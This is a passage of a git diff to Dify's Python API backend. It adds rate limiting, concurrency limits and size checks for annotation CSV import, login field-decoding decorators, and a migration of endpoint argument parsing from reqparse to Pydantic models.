AnnotationExportApi(Resource): @console_ns.doc("export_annotations") - @console_ns.doc(description="Export all annotations for an app") + @console_ns.doc(description="Export all annotations for an app with CSV injection protection") @console_ns.doc(params={"app_id": "Application ID"}) @console_ns.response( 200, @@ -272,8 +274,14 @@ class AnnotationExportApi(Resource): def get(self, app_id): app_id = str(app_id) annotation_list = AppAnnotationService.export_annotation_list_by_app_id(app_id) - response = {"data": marshal(annotation_list, annotation_fields)} - return response, 200 + response_data = {"data": marshal(annotation_list, annotation_fields)} + + # Create response with secure headers for CSV export + response = make_response(response_data, 200) + response.headers["Content-Type"] = "application/json; charset=utf-8" + response.headers["X-Content-Type-Options"] = "nosniff" + + return response @console_ns.route("/apps//annotations/") @@ -314,18 +322,25 @@ class AnnotationUpdateDeleteApi(Resource): @console_ns.route("/apps//annotations/batch-import") class AnnotationBatchImportApi(Resource): @console_ns.doc("batch_import_annotations") - @console_ns.doc(description="Batch import annotations from CSV file") + @console_ns.doc(description="Batch import annotations from CSV file with rate limiting and security checks") @console_ns.doc(params={"app_id": "Application ID"}) @console_ns.response(200, "Batch import started successfully") @console_ns.response(403, "Insufficient permissions") @console_ns.response(400, "No file uploaded or too many files") + @console_ns.response(413, "File too large") + @console_ns.response(429, "Too many requests or concurrent imports") @setup_required @login_required @account_initialization_required @cloud_edition_billing_resource_check("annotation") + @annotation_import_rate_limit + @annotation_import_concurrency_limit @edit_permission_required def post(self, app_id): + from configs import dify_config + app_id = str(app_id) + # check file if "file" not in request.files: raise NoFileUploadedError() @@ -335,9 +350,27 @@ class AnnotationBatchImportApi(Resource): # get file from request file = request.files["file"] + # check file type if not file.filename or not file.filename.lower().endswith(".csv"): raise ValueError("Invalid file type. Only CSV files are allowed") + + # Check file size before processing + file.seek(0, 2) # Seek to end of file + file_size = file.tell() + file.seek(0) # Reset to beginning + + max_size_bytes = dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT * 1024 * 1024 + if file_size > max_size_bytes: + abort( + 413, + f"File size exceeds maximum limit of {dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT}MB. " + f"Please reduce the file size and try again.", + ) + + if file_size == 0: + raise ValueError("The uploaded file is empty") + return AppAnnotationService.batch_import_app_annotations(app_id, file) diff --git a/api/controllers/console/app/workflow_trigger.py b/api/controllers/console/app/workflow_trigger.py index 5d16e4f979..9433b732e4 100644 --- a/api/controllers/console/app/workflow_trigger.py +++ b/api/controllers/console/app/workflow_trigger.py @@ -114,7 +114,7 @@ class AppTriggersApi(Resource): @console_ns.route("/apps//trigger-enable") class AppTriggerEnableApi(Resource): - @console_ns.expect(console_ns.models[ParserEnable.__name__], validate=True) + @console_ns.expect(console_ns.models[ParserEnable.__name__]) @setup_required @login_required @account_initialization_required diff --git a/api/controllers/console/auth/login.py b/api/controllers/console/auth/login.py index f486f4c313..772d98822e 100644 --- a/api/controllers/console/auth/login.py +++ b/api/controllers/console/auth/login.py @@ -22,7 +22,12 @@ from controllers.console.error import ( NotAllowedCreateWorkspace, WorkspacesLimitExceeded, ) -from controllers.console.wraps import email_password_login_enabled, setup_required +from controllers.console.wraps import ( + decrypt_code_field, + decrypt_password_field, + email_password_login_enabled, + setup_required, +) from events.tenant_event import tenant_was_created from libs.helper import EmailStr, extract_remote_ip from libs.login import current_account_with_tenant @@ -79,6 +84,7 @@ class LoginApi(Resource): @setup_required @email_password_login_enabled @console_ns.expect(console_ns.models[LoginPayload.__name__]) + @decrypt_password_field def post(self): """Authenticate user and login.""" args = LoginPayload.model_validate(console_ns.payload) @@ -218,6 +224,7 @@ class EmailCodeLoginSendEmailApi(Resource): class EmailCodeLoginApi(Resource): @setup_required @console_ns.expect(console_ns.models[EmailCodeLoginPayload.__name__]) + @decrypt_code_field def post(self): args = EmailCodeLoginPayload.model_validate(console_ns.payload) diff --git a/api/controllers/console/datasets/data_source.py b/api/controllers/console/datasets/data_source.py index 01f268d94d..cd958bbb36 100644 --- a/api/controllers/console/datasets/data_source.py +++ b/api/controllers/console/datasets/data_source.py @@ -140,6 +140,18 @@ class DataSourceNotionListApi(Resource): credential_id = request.args.get("credential_id", default=None, type=str) if not credential_id: raise ValueError("Credential id is required.") + + # Get datasource_parameters from query string (optional, for GitHub and other datasources) + datasource_parameters_str = request.args.get("datasource_parameters", default=None, type=str) + datasource_parameters = {} + if datasource_parameters_str: + try: + datasource_parameters = json.loads(datasource_parameters_str) + if not isinstance(datasource_parameters, dict): + raise ValueError("datasource_parameters must be a JSON object.") + except json.JSONDecodeError: + raise ValueError("Invalid datasource_parameters JSON format.") + datasource_provider_service = DatasourceProviderService() credential = datasource_provider_service.get_datasource_credentials( tenant_id=current_tenant_id, @@ -187,7 +199,7 @@ class DataSourceNotionListApi(Resource): online_document_result: Generator[OnlineDocumentPagesMessage, None, None] = ( datasource_runtime.get_online_document_pages( user_id=current_user.id, - datasource_parameters={}, + datasource_parameters=datasource_parameters, provider_type=datasource_runtime.datasource_provider_type(), ) ) @@ -218,14 +230,14 @@ class DataSourceNotionListApi(Resource): @console_ns.route( - "/notion/workspaces//pages///preview", + "/notion/pages///preview", "/datasets/notion-indexing-estimate", ) class DataSourceNotionApi(Resource): @setup_required @login_required @account_initialization_required - def get(self, workspace_id, page_id, page_type): + def get(self, page_id, page_type): _, current_tenant_id = current_account_with_tenant() credential_id = request.args.get("credential_id", default=None, type=str) @@ -239,11 +251,10 @@ class DataSourceNotionApi(Resource): plugin_id="langgenius/notion_datasource", ) - workspace_id = str(workspace_id) page_id = str(page_id) extractor = NotionExtractor( - notion_workspace_id=workspace_id, + notion_workspace_id="", notion_obj_id=page_id, notion_page_type=page_type, notion_access_token=credential.get("integration_secret"), diff --git a/api/controllers/console/datasets/datasets.py b/api/controllers/console/datasets/datasets.py index 70b6e932e9..8ceb896d4f 100644 --- a/api/controllers/console/datasets/datasets.py +++ b/api/controllers/console/datasets/datasets.py @@ -146,7 +146,7 @@ class DatasetUpdatePayload(BaseModel): embedding_model: str | None = None embedding_model_provider: str | None = None retrieval_model: dict[str, Any] | None = None - partial_member_list: list[str] | None = None + partial_member_list: list[dict[str, str]] | None = None external_retrieval_model: dict[str, Any] | None = None external_knowledge_id: str | None = None external_knowledge_api_id: str | None = None @@ -223,6 +223,7 @@ def _get_retrieval_methods_by_vector_type(vector_type: str | None, is_mock: bool VectorType.COUCHBASE, VectorType.OPENGAUSS, VectorType.OCEANBASE, + VectorType.SEEKDB, VectorType.TABLESTORE, VectorType.HUAWEI_CLOUD, VectorType.TENCENT, @@ -230,6 +231,7 @@ def _get_retrieval_methods_by_vector_type(vector_type: str | None, is_mock: bool VectorType.CLICKZETTA, VectorType.BAIDU, VectorType.ALIBABACLOUD_MYSQL, + VectorType.IRIS, } semantic_methods = {"retrieval_method": [RetrievalMethod.SEMANTIC_SEARCH.value]} diff --git a/api/controllers/console/datasets/rag_pipeline/datasource_content_preview.py b/api/controllers/console/datasets/rag_pipeline/datasource_content_preview.py index 42387557d6..7caf5b52ed 100644 --- a/api/controllers/console/datasets/rag_pipeline/datasource_content_preview.py +++ b/api/controllers/console/datasets/rag_pipeline/datasource_content_preview.py @@ -26,7 +26,7 @@ console_ns.schema_model(Parser.__name__, Parser.model_json_schema(ref_template=D @console_ns.route("/rag/pipelines//workflows/published/datasource/nodes//preview") class DataSourceContentPreviewApi(Resource): - @console_ns.expect(console_ns.models[Parser.__name__], validate=True) + @console_ns.expect(console_ns.models[Parser.__name__]) @setup_required @login_required @account_initialization_required diff --git a/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py b/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py index debe8eed97..46d67f0581 100644 --- a/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py +++ b/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py @@ -4,7 +4,7 @@ from typing import Any, Literal, cast from uuid import UUID from flask import abort, request -from flask_restx import Resource, marshal_with # type: ignore +from flask_restx import Resource, marshal_with, reqparse # type: ignore from pydantic import BaseModel, Field from sqlalchemy.orm import Session from werkzeug.exceptions import Forbidden, InternalServerError, NotFound @@ -975,6 +975,11 @@ class RagPipelineRecommendedPluginApi(Resource): @login_required @account_initialization_required def get(self): + parser = reqparse.RequestParser() + parser.add_argument("type", type=str, location="args", required=False, default="all") + args = parser.parse_args() + type = args["type"] + rag_pipeline_service = RagPipelineService() - recommended_plugins = rag_pipeline_service.get_recommended_plugins() + recommended_plugins = rag_pipeline_service.get_recommended_plugins(type) return recommended_plugins diff --git a/api/controllers/console/explore/completion.py b/api/controllers/console/explore/completion.py index 5901eca915..a6e5b2822a 100644 --- a/api/controllers/console/explore/completion.py +++ b/api/controllers/console/explore/completion.py @@ -40,7 +40,7 @@ from .. import console_ns logger = logging.getLogger(__name__) -class CompletionMessagePayload(BaseModel): +class CompletionMessageExplorePayload(BaseModel): inputs: dict[str, Any] query: str = "" files: list[dict[str, Any]] | None = None @@ -71,7 +71,7 @@ class ChatMessagePayload(BaseModel): raise ValueError("must be a valid UUID") from exc -register_schema_models(console_ns, CompletionMessagePayload, ChatMessagePayload) +register_schema_models(console_ns, CompletionMessageExplorePayload, ChatMessagePayload) # define completion api for user @@ -80,13 +80,13 @@ register_schema_models(console_ns, CompletionMessagePayload, ChatMessagePayload) endpoint="installed_app_completion", ) class CompletionApi(InstalledAppResource): - @console_ns.expect(console_ns.models[CompletionMessagePayload.__name__]) + @console_ns.expect(console_ns.models[CompletionMessageExplorePayload.__name__]) def post(self, installed_app): app_model = installed_app.app if app_model.mode != AppMode.COMPLETION: raise NotCompletionAppError() - payload = CompletionMessagePayload.model_validate(console_ns.payload or {}) + payload = CompletionMessageExplorePayload.model_validate(console_ns.payload or {}) args = payload.model_dump(exclude_none=True) streaming = payload.response_mode == "streaming" diff --git a/api/controllers/console/tag/tags.py b/api/controllers/console/tag/tags.py index 17cfc3ff4b..e9fbb515e4 100644 --- a/api/controllers/console/tag/tags.py +++ b/api/controllers/console/tag/tags.py @@ -1,31 +1,40 @@ +from typing import Literal + from flask import request -from flask_restx import Resource, marshal_with, reqparse +from flask_restx import Resource, marshal_with +from pydantic import BaseModel, Field from werkzeug.exceptions import Forbidden +from controllers.common.schema import register_schema_models from controllers.console import console_ns from controllers.console.wraps import account_initialization_required, edit_permission_required, setup_required from fields.tag_fields import dataset_tag_fields from libs.login import current_account_with_tenant, login_required -from models.model import Tag from services.tag_service import TagService -def _validate_name(name): - if not name or len(name) < 1 or len(name) > 50: - raise ValueError("Name must be between 1 to 50 characters.") - return name +class TagBasePayload(BaseModel): + name: str = Field(description="Tag name", min_length=1, max_length=50) + type: Literal["knowledge", "app"] | None = Field(default=None, description="Tag type") -parser_tags = ( - reqparse.RequestParser() - .add_argument( - "name", - nullable=False, - required=True, - help="Name must be between 1 to 50 characters.", - type=_validate_name, - ) - .add_argument("type", type=str, location="json", choices=Tag.TAG_TYPE_LIST, nullable=True, help="Invalid tag type.") +class TagBindingPayload(BaseModel): + tag_ids: list[str] = Field(description="Tag IDs to bind") + target_id: str = Field(description="Target ID to bind tags to") + type: Literal["knowledge", "app"] | None = Field(default=None, description="Tag type") + + +class TagBindingRemovePayload(BaseModel): + tag_id: str = Field(description="Tag ID to remove") + target_id: str = Field(description="Target ID to unbind tag from") + type: Literal["knowledge", "app"] | None = Field(default=None, description="Tag type") + + +register_schema_models( + console_ns, + TagBasePayload, + TagBindingPayload, + TagBindingRemovePayload, ) @@ -43,7 +52,7 @@ class TagListApi(Resource): return tags, 200 - @console_ns.expect(parser_tags) + @console_ns.expect(console_ns.models[TagBasePayload.__name__]) @setup_required @login_required @account_initialization_required @@ -53,22 +62,17 @@ class TagListApi(Resource): if not (current_user.has_edit_permission or current_user.is_dataset_editor): raise Forbidden() - args = parser_tags.parse_args() - tag = TagService.save_tags(args) + payload = TagBasePayload.model_validate(console_ns.payload or {}) + tag = TagService.save_tags(payload.model_dump()) response = {"id": tag.id, "name": tag.name, "type": tag.type, "binding_count": 0} return response, 200 -parser_tag_id = reqparse.RequestParser().add_argument( - "name", nullable=False, required=True, help="Name must be between 1 to 50 characters.", type=_validate_name -) - - @console_ns.route("/tags/") class TagUpdateDeleteApi(Resource): - @console_ns.expect(parser_tag_id) + @console_ns.expect(console_ns.models[TagBasePayload.__name__]) @setup_required @login_required @account_initialization_required @@ -79,8 +83,8 @@ class TagUpdateDeleteApi(Resource): if not (current_user.has_edit_permission or current_user.is_dataset_editor): raise Forbidden() - args = parser_tag_id.parse_args() - tag = TagService.update_tags(args, tag_id) + payload = TagBasePayload.model_validate(console_ns.payload or {}) + tag = TagService.update_tags(payload.model_dump(), tag_id) binding_count = TagService.get_tag_binding_count(tag_id) @@ -100,17 +104,9 @@ class TagUpdateDeleteApi(Resource): return 204 -parser_create = ( - reqparse.RequestParser() - .add_argument("tag_ids", type=list, nullable=False, required=True, location="json", help="Tag IDs is required.") - .add_argument("target_id", type=str, nullable=False, required=True, location="json", help="Target ID is required.") - .add_argument("type", type=str, location="json", choices=Tag.TAG_TYPE_LIST, nullable=True, help="Invalid tag type.") -) - - @console_ns.route("/tag-bindings/create") class TagBindingCreateApi(Resource): - @console_ns.expect(parser_create) + @console_ns.expect(console_ns.models[TagBindingPayload.__name__]) @setup_required @login_required @account_initialization_required @@ -120,23 +116,15 @@ class TagBindingCreateApi(Resource): if not (current_user.has_edit_permission or current_user.is_dataset_editor): raise Forbidden() - args = parser_create.parse_args() - TagService.save_tag_binding(args) + payload = TagBindingPayload.model_validate(console_ns.payload or {}) + TagService.save_tag_binding(payload.model_dump()) return {"result": "success"}, 200 -parser_remove = ( - reqparse.RequestParser() - .add_argument("tag_id", type=str, nullable=False, required=True, help="Tag ID is required.") - .add_argument("target_id", type=str, nullable=False, required=True, help="Target ID is required.") - .add_argument("type", type=str, location="json", choices=Tag.TAG_TYPE_LIST, nullable=True, help="Invalid tag type.") -) - - @console_ns.route("/tag-bindings/remove") class TagBindingDeleteApi(Resource): - @console_ns.expect(parser_remove) + @console_ns.expect(console_ns.models[TagBindingRemovePayload.__name__]) @setup_required @login_required @account_initialization_required @@ -146,7 +134,7 @@ class TagBindingDeleteApi(Resource): if not (current_user.has_edit_permission or current_user.is_dataset_editor): raise Forbidden() - args = parser_remove.parse_args() - TagService.delete_tag_binding(args) + payload = TagBindingRemovePayload.model_validate(console_ns.payload or {}) + TagService.delete_tag_binding(payload.model_dump()) return {"result": "success"}, 200 diff --git a/api/controllers/console/workspace/models.py b/api/controllers/console/workspace/models.py index a5b45ef514..2def57ed7b 100644 --- a/api/controllers/console/workspace/models.py +++ b/api/controllers/console/workspace/models.py @@ -282,9 +282,10 @@ class ModelProviderModelCredentialApi(Resource): tenant_id=tenant_id, provider_name=provider ) else: - model_type = args.model_type + # Normalize model_type to the origin value stored in DB (e.g., "text-generation" for LLM) + normalized_model_type = args.model_type.to_origin_model_type() available_credentials = model_provider_service.provider_manager.get_provider_model_available_credentials( - tenant_id=tenant_id, provider_name=provider, model_type=model_type, model_name=args.model + tenant_id=tenant_id, provider_name=provider, model_type=normalized_model_type, model_name=args.model ) return jsonable_encoder( diff --git a/api/controllers/console/workspace/plugin.py b/api/controllers/console/workspace/plugin.py index c5624e0fc2..805058ba5a 100644 --- a/api/controllers/console/workspace/plugin.py +++ b/api/controllers/console/workspace/plugin.py @@ -46,8 +46,8 @@ class PluginDebuggingKeyApi(Resource): class ParserList(BaseModel): - page: int = Field(default=1) - page_size: int = Field(default=256) + page: int = Field(default=1, ge=1, description="Page number") + page_size: int = Field(default=256, ge=1, le=256, description="Page size (1-256)") reg(ParserList) @@ -106,8 +106,8 @@ class ParserPluginIdentifierQuery(BaseModel): class ParserTasks(BaseModel): - page: int - page_size: int + page: int = Field(default=1, ge=1, description="Page number") + page_size: int = Field(default=256, ge=1, le=256, description="Page size (1-256)") class ParserMarketplaceUpgrade(BaseModel): diff --git a/api/controllers/console/wraps.py b/api/controllers/console/wraps.py index f40f566a36..95fc006a12 100644 --- a/api/controllers/console/wraps.py +++ b/api/controllers/console/wraps.py @@ -9,10 +9,12 @@ from typing import ParamSpec, TypeVar from flask import abort, request from configs import dify_config +from controllers.console.auth.error import AuthenticationFailedError, EmailCodeError from controllers.console.workspace.error import AccountNotInitializedError from enums.cloud_plan import CloudPlan from extensions.ext_database import db from extensions.ext_redis import redis_client +from libs.encryption import FieldEncryption from libs.login import current_account_with_tenant from models.account import AccountStatus from models.dataset import RateLimitLog @@ -25,6 +27,14 @@ from .error import NotInitValidateError, NotSetupError, UnauthorizedAndForceLogo P = ParamSpec("P") R = TypeVar("R") +# Field names for decryption +FIELD_NAME_PASSWORD = "password" +FIELD_NAME_CODE = "code" + +# Error messages for decryption failures +ERROR_MSG_INVALID_ENCRYPTED_DATA = "Invalid encrypted data" +ERROR_MSG_INVALID_ENCRYPTED_CODE = "Invalid encrypted code" + def account_initialization_required(view: Callable[P, R]): @wraps(view) @@ -331,3 +341,163 @@ def is_admin_or_owner_required(f: Callable[P, R]): return f(*args, **kwargs) return decorated_function + + +def annotation_import_rate_limit(view: Callable[P, R]): + """ + Rate limiting decorator for annotation import operations. + + Implements sliding window rate limiting with two tiers: + - Short-term: Configurable requests per minute (default: 5) + - Long-term: Configurable requests per hour (default: 20) + + Uses Redis ZSET for distributed rate limiting across multiple instances. + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _, current_tenant_id = current_account_with_tenant() + current_time = int(time.time() * 1000) + + # Check per-minute rate limit + minute_key = f"annotation_import_rate_limit:{current_tenant_id}:1min" + redis_client.zadd(minute_key, {current_time: current_time}) + redis_client.zremrangebyscore(minute_key, 0, current_time - 60000) + minute_count = redis_client.zcard(minute_key) + redis_client.expire(minute_key, 120) # 2 minutes TTL + + if minute_count > dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: + abort( + 429, + f"Too many annotation import requests. Maximum {dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE} " + f"requests per minute allowed. Please try again later.", + ) + + # Check per-hour rate limit + hour_key = f"annotation_import_rate_limit:{current_tenant_id}:1hour" + redis_client.zadd(hour_key, {current_time: current_time}) + redis_client.zremrangebyscore(hour_key, 0, current_time - 3600000) + hour_count = redis_client.zcard(hour_key) + redis_client.expire(hour_key, 7200) # 2 hours TTL + + if hour_count > dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: + abort( + 429, + f"Too many annotation import requests. Maximum {dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR} " + f"requests per hour allowed. Please try again later.", + ) + + return view(*args, **kwargs) + + return decorated + + +def annotation_import_concurrency_limit(view: Callable[P, R]): + """ + Concurrency control decorator for annotation import operations. + + Limits the number of concurrent import tasks per tenant to prevent + resource exhaustion and ensure fair resource allocation. + + Uses Redis ZSET to track active import jobs with automatic cleanup + of stale entries (jobs older than 2 minutes). + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _, current_tenant_id = current_account_with_tenant() + current_time = int(time.time() * 1000) + + active_jobs_key = f"annotation_import_active:{current_tenant_id}" + + # Clean up stale entries (jobs that should have completed or timed out) + stale_threshold = current_time - 120000 # 2 minutes ago + redis_client.zremrangebyscore(active_jobs_key, 0, stale_threshold) + + # Check current active job count + active_count = redis_client.zcard(active_jobs_key) + + if active_count >= dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT: + abort( + 429, + f"Too many concurrent import tasks. Maximum {dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT} " + f"concurrent imports allowed per workspace. Please wait for existing imports to complete.", + ) + + # Allow the request to proceed + # The actual job registration will happen in the service layer + return view(*args, **kwargs) + + return decorated + + +def _decrypt_field(field_name: str, error_class: type[Exception], error_message: str) -> None: + """ + Helper to decode a Base64 encoded field in the request payload. + + Args: + field_name: Name of the field to decode + error_class: Exception class to raise on decoding failure + error_message: Error message to include in the exception + """ + if not request or not request.is_json: + return + # Get the payload dict - it's cached and mutable + payload = request.get_json() + if not payload or field_name not in payload: + return + encoded_value = payload[field_name] + decoded_value = FieldEncryption.decrypt_field(encoded_value) + + # If decoding failed, raise error immediately + if decoded_value is None: + raise error_class(error_message) + + # Update payload dict in-place with decoded value + # Since payload is a mutable dict and get_json() returns the cached reference, + # modifying it will affect all subsequent accesses including console_ns.payload + payload[field_name] = decoded_value + + +def decrypt_password_field(view: Callable[P, R]): + """ + Decorator to decrypt password field in request payload. + + Automatically decrypts the 'password' field if encryption is enabled. + If decryption fails, raises AuthenticationFailedError. + + Usage: + @decrypt_password_field + def post(self): + args = LoginPayload.model_validate(console_ns.payload) + # args.password is now decrypted + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _decrypt_field(FIELD_NAME_PASSWORD, AuthenticationFailedError, ERROR_MSG_INVALID_ENCRYPTED_DATA) + return view(*args, **kwargs) + + return decorated + + +def decrypt_code_field(view: Callable[P, R]): + """ + Decorator to decrypt verification code field in request payload. + + Automatically decrypts the 'code' field if encryption is enabled. + If decryption fails, raises EmailCodeError. + + Usage: + @decrypt_code_field + def post(self): + args = EmailCodeLoginPayload.model_validate(console_ns.payload) + # args.code is now decrypted + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _decrypt_field(FIELD_NAME_CODE, EmailCodeError, ERROR_MSG_INVALID_ENCRYPTED_CODE) + return view(*args, **kwargs) + + return decorated diff --git a/api/controllers/service_api/app/completion.py b/api/controllers/service_api/app/completion.py index b7fb01c6fe..b3836f3a47 100644 --- a/api/controllers/service_api/app/completion.py +++ b/api/controllers/service_api/app/completion.py @@ -61,6 +61,9 @@ class ChatRequestPayload(BaseModel): @classmethod def normalize_conversation_id(cls, value: str | UUID | None) -> str | None: """Allow missing or blank conversation IDs; enforce UUID format when provided.""" + if isinstance(value, str): + value = value.strip() + if not value: return None diff --git a/api/controllers/service_api/dataset/dataset.py b/api/controllers/service_api/dataset/dataset.py index 7692aeed23..4f91f40c55 100644 --- a/api/controllers/service_api/dataset/dataset.py +++ b/api/controllers/service_api/dataset/dataset.py @@ -49,7 +49,7 @@ class DatasetUpdatePayload(BaseModel): embedding_model: str | None = None embedding_model_provider: str | None = None retrieval_model: RetrievalModel | None = None - partial_member_list: list[str] | None = None + partial_member_list: list[dict[str, str]] | None = None external_retrieval_model: dict[str, Any] | None = None external_knowledge_id: str | None = None external_knowledge_api_id: str | None = None diff --git a/api/controllers/trigger/trigger.py b/api/controllers/trigger/trigger.py index e69b22d880..c10b94050c 100644 --- a/api/controllers/trigger/trigger.py +++ b/api/controllers/trigger/trigger.py @@ -33,7 +33,7 @@ def trigger_endpoint(endpoint_id: str): if response: break if not response: - logger.error("Endpoint not found for {endpoint_id}") + logger.info("Endpoint not found for %s", endpoint_id) return jsonify({"error": "Endpoint not found"}), 404 return response except ValueError as e: diff --git a/api/controllers/web/audio.py b/api/controllers/web/audio.py index b9fef48c4d..15828cc208 100644 --- a/api/controllers/web/audio.py +++ b/api/controllers/web/audio.py @@ -1,7 +1,8 @@ import logging from flask import request -from flask_restx import fields, marshal_with, reqparse +from flask_restx import fields, marshal_with +from pydantic import BaseModel, field_validator from werkzeug.exceptions import InternalServerError import services @@ -20,6 +21,7 @@ from controllers.web.error import ( from controllers.web.wraps import WebApiResource from core.errors.error import ModelCurrentlyNotSupportError, ProviderTokenNotInitError, QuotaExceededError from core.model_runtime.errors.invoke import InvokeError +from libs.helper import uuid_value from models.model import App from services.audio_service import AudioService from services.errors.audio import ( @@ -29,6 +31,25 @@ from services.errors.audio import ( UnsupportedAudioTypeServiceError, ) +from ..common.schema import register_schema_models + + +class TextToAudioPayload(BaseModel): + message_id: str | None = None + voice: str | None = None + text: str | None = None + streaming: bool | None = None + + @field_validator("message_id") + @classmethod + def validate_message_id(cls, value: str | None) -> str | None: + if value is None: + return value + return uuid_value(value) + + +register_schema_models(web_ns, TextToAudioPayload) + logger = logging.getLogger(__name__) @@ -88,6 +109,7 @@ class AudioApi(WebApiResource): @web_ns.route("/text-to-audio") class TextApi(WebApiResource): + @web_ns.expect(web_ns.models[TextToAudioPayload.__name__]) @web_ns.doc("Text to Audio") @web_ns.doc(description="Convert text to audio using text-to-speech service.") @web_ns.doc( @@ -102,18 +124,11 @@ class TextApi(WebApiResource): def post(self, app_model: App, end_user): """Convert text to audio""" try: - parser = ( - reqparse.RequestParser() - .add_argument("message_id", type=str, required=False, location="json") - .add_argument("voice", type=str, location="json") - .add_argument("text", type=str, location="json") - .add_argument("streaming", type=bool, location="json") - ) - args = parser.parse_args() + payload = TextToAudioPayload.model_validate(web_ns.payload or {}) - message_id = args.get("message_id", None) - text = args.get("text", None) - voice = args.get("voice", None) + message_id = payload.message_id + text = payload.text + voice = payload.voice response = AudioService.transcript_tts( app_model=app_model, text=text, voice=voice, end_user=end_user.external_user_id, message_id=message_id ) diff --git a/api/controllers/web/completion.py b/api/controllers/web/completion.py index e8a4698375..a97d745471 100644 --- a/api/controllers/web/completion.py +++ b/api/controllers/web/completion.py @@ -1,9 +1,11 @@ import logging +from typing import Any, Literal -from flask_restx import reqparse +from pydantic import BaseModel, Field, field_validator from werkzeug.exceptions import InternalServerError, NotFound import services +from controllers.common.schema import register_schema_models from controllers.web import web_ns from controllers.web.error import ( AppUnavailableError, @@ -34,25 +36,44 @@ from services.errors.llm import InvokeRateLimitError logger = logging.getLogger(__name__) +class CompletionMessagePayload(BaseModel): + inputs: dict[str, Any] = Field(description="Input variables for the completion") + query: str = Field(default="", description="Query text for completion") + files: list[dict[str, Any]] | None = Field(default=None, description="Files to be processed") + response_mode: Literal["blocking", "streaming"] | None = Field( + default=None, description="Response mode: blocking or streaming" + ) + retriever_from: str = Field(default="web_app", description="Source of retriever") + + +class ChatMessagePayload(BaseModel): + inputs: dict[str, Any] = Field(description="Input variables for the chat") + query: str = Field(description="User query/message") + files: list[dict[str, Any]] | None = Field(default=None, description="Files to be processed") + response_mode: Literal["blocking", "streaming"] | None = Field( + default=None, description="Response mode: blocking or streaming" + ) + conversation_id: str | None = Field(default=None, description="Conversation ID") + parent_message_id: str | None = Field(default=None, description="Parent message ID") + retriever_from: str = Field(default="web_app", description="Source of retriever") + + @field_validator("conversation_id", "parent_message_id") + @classmethod + def validate_uuid(cls, value: str | None) -> str | None: + if value is None: + return value + return uuid_value(value) + + +register_schema_models(web_ns, CompletionMessagePayload, ChatMessagePayload) + + # define completion api for user @web_ns.route("/completion-messages") class CompletionApi(WebApiResource): @web_ns.doc("Create Completion Message") @web_ns.doc(description="Create a completion message for text generation applications.") - @web_ns.doc( - params={ - "inputs": {"description": "Input variables for the completion", "type": "object", "required": True}, - "query": {"description": "Query text for completion", "type": "string", "required": False}, - "files": {"description": "Files to be processed", "type": "array", "required": False}, - "response_mode": { - "description": "Response mode: blocking or streaming", - "type": "string", - "enum": ["blocking", "streaming"], - "required": False, - }, - "retriever_from": {"description": "Source of retriever", "type": "string", "required": False}, - } - ) + @web_ns.expect(web_ns.models[CompletionMessagePayload.__name__]) @web_ns.doc( responses={ 200: "Success", @@ -67,18 +88,10 @@ class CompletionApi(WebApiResource): if app_model.mode != AppMode.COMPLETION: raise NotCompletionAppError() - parser = ( - reqparse.RequestParser() - .add_argument("inputs", type=dict, required=True, location="json") - .add_argument("query", type=str, location="json", default="") - .add_argument("files", type=list, required=False, location="json") - .add_argument("response_mode", type=str, choices=["blocking", "streaming"], location="json") - .add_argument("retriever_from", type=str, required=False, default="web_app", location="json") - ) + payload = CompletionMessagePayload.model_validate(web_ns.payload or {}) + args = payload.model_dump(exclude_none=True) - args = parser.parse_args() - - streaming = args["response_mode"] == "streaming" + streaming = payload.response_mode == "streaming" args["auto_generate_name"] = False try: @@ -142,22 +155,7 @@ class CompletionStopApi(WebApiResource): class ChatApi(WebApiResource): @web_ns.doc("Create Chat Message") @web_ns.doc(description="Create a chat message for conversational applications.") - @web_ns.doc( - params={ - "inputs": {"description": "Input variables for the chat", "type": "object", "required": True}, - "query": {"description": "User query/message", "type": "string", "required": True}, - "files": {"description": "Files to be processed", "type": "array", "required": False}, - "response_mode": { - "description": "Response mode: blocking or streaming", - "type": "string", - "enum": ["blocking", "streaming"], - "required": False, - }, - "conversation_id": {"description": "Conversation UUID", "type": "string", "required": False}, - "parent_message_id": {"description": "Parent message UUID", "type": "string", "required": False}, - "retriever_from": {"description": "Source of retriever", "type": "string", "required": False}, - } - ) + @web_ns.expect(web_ns.models[ChatMessagePayload.__name__]) @web_ns.doc( responses={ 200: "Success", @@ -173,20 +171,10 @@ class ChatApi(WebApiResource): if app_mode not in {AppMode.CHAT, AppMode.AGENT_CHAT, AppMode.ADVANCED_CHAT}: raise NotChatAppError() - parser = ( - reqparse.RequestParser() - .add_argument("inputs", type=dict, required=True, location="json") - .add_argument("query", type=str, required=True, location="json") - .add_argument("files", type=list, required=False, location="json") - .add_argument("response_mode", type=str, choices=["blocking", "streaming"], location="json") - .add_argument("conversation_id", type=uuid_value, location="json") - .add_argument("parent_message_id", type=uuid_value, required=False, location="json") - .add_argument("retriever_from", type=str, required=False, default="web_app", location="json") - ) + payload = ChatMessagePayload.model_validate(web_ns.payload or {}) + args = payload.model_dump(exclude_none=True) - args = parser.parse_args() - - streaming = args["response_mode"] == "streaming" + streaming = payload.response_mode == "streaming" args["auto_generate_name"] = False try: diff --git a/api/core/app/app_config/entities.py b/api/core/app/app_config/entities.py index 93f2742599..307af3747c 100644 --- a/api/core/app/app_config/entities.py +++ b/api/core/app/app_config/entities.py @@ -1,3 +1,4 @@ +import json from collections.abc import Sequence from enum import StrEnum, auto from typing import Any, Literal @@ -120,7 +121,7 @@ class VariableEntity(BaseModel): allowed_file_types: Sequence[FileType] | None = Field(default_factory=list) allowed_file_extensions: 